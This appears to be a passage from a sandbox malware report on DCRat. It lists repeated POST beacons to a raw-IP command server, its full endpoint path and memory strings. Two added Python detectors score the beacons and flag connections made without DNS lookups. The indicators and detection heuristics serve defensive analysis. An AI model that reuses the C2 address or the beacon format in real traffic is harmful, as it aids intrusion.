                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
Source: global traffic | HTTP traffic detected: 18 POST requests to the same endpoint, differing only in Content-Length (2544 in 14 requests, 2536 in 2, 2012 in 1, 2036 in 1) and in whether a Connection: Keep-Alive header is present (12 of the 18). Representative request:
POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
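The 18 POST requests listed above share everything except the body size, which is the shape of a beacon rather than of browser traffic. The following Python is an added triage example (it is not part of the Joe Sandbox report and not code from the sample): it rebuilds the recorded requests as raw HTTP messages, applies a fixed set of heuristics to each (Host is an IP literal, opaque POST body, a browser User-Agent with none of the headers a browser actually sends, an Expect: 100-continue header that the .NET HttpWebRequest adds by default and browsers never do, and a deep word-salad path ending in one .php), and then clusters the flagged requests by endpoint and Content-Length. The indicator names and the score threshold are this example's own choices, and the benign GET request is constructed for contrast.

```python
"""Beacon triage over the captured requests (added example; not part of the Joe Sandbox report)."""
from __future__ import annotations

import ipaddress
import re
from collections import Counter
from dataclasses import dataclass

# Endpoint and User-Agent exactly as recorded in the report above.
C2_PATH = ("/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/"
           "1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/"
           "3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php")
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
              "Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29")


def make_post(length: int, keep_alive: bool) -> str:
    """Rebuild one of the recorded POSTs as a raw HTTP/1.1 message (constructed sample)."""
    lines = [f"POST {C2_PATH} HTTP/1.1",
             "Content-Type: application/octet-stream",
             f"User-Agent: {BROWSER_UA}",
             "Host: 89.23.100.242",
             f"Content-Length: {length}",
             "Expect: 100-continue"]
    if keep_alive:
        lines.append("Connection: Keep-Alive")
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed sample set: the 18 beacons as they appear above, plus one ordinary
# browser request for contrast.
SAMPLE_REQUESTS = (
    [make_post(2544, False)] * 6 + [make_post(2544, True)] * 8
    + [make_post(2012, True), make_post(2036, True)] + [make_post(2536, True)] * 2
    + ["GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
       f"User-Agent: {BROWSER_UA}\r\nAccept: text/html\r\nAccept-Language: en-US\r\n\r\n"]
)


@dataclass
class Request:
    method: str
    path: str
    headers: dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Parse the request line and headers of a raw HTTP/1.x message."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def indicators(req: Request) -> list[str]:
    """Heuristics that separate this beacon from real browser traffic, in a fixed order."""
    hits = []
    host = req.headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
        hits.append("host-is-ip-literal")       # hard-coded C2 address, no DNS involved
    except ValueError:
        pass
    if req.method == "POST" and req.headers.get("content-type", "").startswith("application/octet-stream"):
        hits.append("opaque-post-body")         # serialised/encrypted payload, not a form
    ua = req.headers.get("user-agent", "")
    if ua.startswith("Mozilla/") and not any(h in req.headers for h in ("accept", "accept-language", "referer", "cookie")):
        hits.append("browser-ua-without-browser-headers")
    if req.headers.get("expect", "").lower() == "100-continue":
        hits.append("expect-100-continue")      # .NET HttpWebRequest default on POST; browsers never send it
    segments = [s for s in req.path.split("/") if s]
    if len(segments) >= 6 and segments[-1].endswith(".php") and re.fullmatch(r"[A-Za-z0-9]+", segments[-1][:-4]):
        hits.append("deep-generated-php-path")  # long run of word-salad directories ending in one .php
    return hits


def summarize(raw_requests: list[str], threshold: int = 3) -> dict:
    """Aggregate flagged requests by endpoint and body size; the size clustering is the beacon fingerprint."""
    lengths: Counter[int] = Counter()
    endpoints = set()
    flagged = 0
    for raw in raw_requests:
        req = parse_request(raw)
        if len(indicators(req)) >= threshold:
            flagged += 1
            endpoints.add((req.headers.get("host", ""), req.path))
            lengths[int(req.headers.get("content-length", "0"))] += 1
    return {"flagged": flagged, "endpoints": sorted(endpoints), "content_lengths": dict(lengths)}
```

Run against the sample set, all 18 beacons trip all five indicators and the browser GET trips none; the Content-Length histogram the summary returns (2544 x14, 2536 x2, 2012, 2036) is the same distribution as the table above, and that near-constant body size to one raw-IP endpoint is what to alert on, independent of the path, which DCRat builds per campaign.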
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.100.242 (50 such connections recorded)
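Every one of the 50 connections above goes to an address the sample never looked up, which is the signal the "without corresponding DNS query" detection keys on. The Python below is an added example of that correlation (not part of the report, and the log lines are constructed Zeek-style subsets, not the sandbox's own capture): it indexes DNS answers by IP with the time each answer arrived, then walks the connection log and reports any external destination that had no answer at all, or whose only answer arrived after the connection was already made. Resolver traffic on port 53 and non-global destinations are skipped so the local gateway does not show up as a finding; the timestamps, hostnames and internal addresses are invented for the example.

```python
"""Connections without a preceding DNS answer (added example; not part of the Joe Sandbox report)."""
from __future__ import annotations

import ipaddress
from collections import Counter, defaultdict

# Constructed sample logs, tab separated.
#   DNS_LOG  columns: ts, query name, comma-separated answers
#   CONN_LOG columns: ts, source, destination, destination port
DNS_LOG = (
    "1736250000.10\tupdate.microsoft.com\t13.107.4.50,13.107.4.52\n"
    "1736250001.20\tcdn.example.net\tCNAME:edge.example.net\n"
    "1736250001.25\tedge.example.net\t151.101.65.69\n"
)
CONN_LOG = (
    "1736249999.00\t192.168.2.5\t13.107.4.50\t443\n"    # connected before the answer arrived
    "1736250000.50\t192.168.2.5\t13.107.4.52\t443\n"    # normal: resolved first
    "1736250002.00\t192.168.2.5\t151.101.65.69\t443\n"  # normal: resolved via the CNAME target
    "1736250003.10\t192.168.2.5\t192.168.2.1\t53\n"     # the resolver itself, ignored
    # 50 connections to the hard-coded C2 address seen in this report, never resolved
    + "".join(f"{1736250003 + i:.2f}\t192.168.2.5\t89.23.100.242\t80\n" for i in range(50))
)


def parse_dns(log: str) -> dict[str, list[tuple[float, str]]]:
    """Map each answered IP to the (answer_time, query_name) pairs that produced it, oldest first."""
    resolved: dict[str, list[tuple[float, str]]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, qname, answers = line.split("\t")
        for answer in answers.split(","):
            try:
                ip = ipaddress.ip_address(answer)
            except ValueError:
                continue  # CNAME/NS/other non-address answers carry no IP
            resolved[str(ip)].append((float(ts), qname))
    for pairs in resolved.values():
        pairs.sort()
    return dict(resolved)


def unresolved_connections(conn_log: str, resolved: dict[str, list[tuple[float, str]]]) -> list[dict]:
    """Connections to global addresses that no DNS answer explains at the time they were made."""
    findings = []
    for line in conn_log.splitlines():
        if not line.strip():
            continue
        ts_text, _src, dst, port = line.split("\t")
        ts, dst_ip = float(ts_text), ipaddress.ip_address(dst)
        if not dst_ip.is_global or dst_ip.is_multicast or int(port) == 53:
            continue  # LAN, loopback, multicast and resolver traffic are out of scope
        answered_before = [name for answered_at, name in resolved.get(dst, []) if answered_at <= ts]
        if answered_before:
            continue
        findings.append({"ts": ts, "dst": dst, "port": int(port),
                         "reason": "dns-after-connect" if dst in resolved else "no-dns"})
    return findings


def count_by_dst(findings: list[dict]) -> dict[str, int]:
    """Collapse findings per destination; 50 hits on one address is a beacon, one hit is usually a cache."""
    return dict(Counter(f["dst"] for f in findings))
```

The "dns-after-connect" case matters in practice: a host that connects first and resolves later is typically using a cached or hard-coded address, and filtering those out as "resolved" would hide exactly the beacons this report shows.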
Source: unknown | HTTP traffic detected:
POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.242
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi
Source: powershell.exe, 0000001A.00000002.2818911280.0000020171E4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000374E000.00000004.00000800.00020000.00000000.sdmp, serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.2801807600.0000020171A60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001A.00000002.2818911280.0000020171DE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.t.com/pk
Source: powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microP
Source: powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microPackageManagementp
Source: powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
